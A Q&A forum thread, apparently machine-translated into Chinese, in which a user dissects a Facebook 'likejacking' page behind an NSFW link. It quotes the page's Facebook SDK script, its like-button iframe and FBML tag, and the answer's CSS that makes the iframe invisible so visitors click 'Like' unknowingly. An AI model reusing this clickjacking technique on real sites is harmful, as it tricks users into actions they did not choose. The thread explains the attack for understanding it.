Question

警告：此链接是NSFW（它是色情内容）。

1truc2dingue.com/3-une-br%C3%A9silienne-enleve-le-bas.html

今天就到了，FB上一位受欢迎的朋友点击了它。我知道这是恶意软件而且他是程序员，所以我去找工作来弄清楚它是如何欺骗他的。

这是我发现的。在页面的开头你会发现：

<script type="text/javascript">
<!--
window.fbAsyncInit = function()
{
 FB.init({appId: '135200846551763', status: true, cookie: true, xfbml: true});
 FB.Event.subscribe('edge.create', function(href, widget) {
    document.getElementById("video").style.display= 'block';
    document.getElementById("preview").style.display= 'none';
 });
};
//-->
</script>

那里没有太多秘密。当页面被Liked（事件愚蠢地称为"edge.create"）时，预览消失，视频（初始化为 display：none 显示）。

当没有明显的“喜欢！”时，如何喜欢页面？按钮。这是脚本背后的技巧。我可以看到该脚本使用了弃用的FBML，

<fb:like id=f2 class=iframe href="http://1truc2dingue.com/3-une-brésilienne-enleve-le-bas.html" layout="button_count" show_faces="false" width="480" style="margin-top:65px;margin-left:110px;"></fb:like>

而且，现代的iFrame API，

<iframe id=f1 class=iframe src="http://www.facebook.com/plugins/like.php?href=http://1truc2dingue.com/3-une-brésilienne-enleve-le-bas.html&amp;layout=button_count&amp;show_faces=false&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:21px;" allowTransparency="true"></iframe>

Answer 1

这称为ClickJacking

您只需点击隐藏的“赞”按钮（.iframe类）

.iframe {
    opacity: 0;
    filter: alpha(opacity=0);
}

这个FB恶意软件是如何工作的？

1 个答案: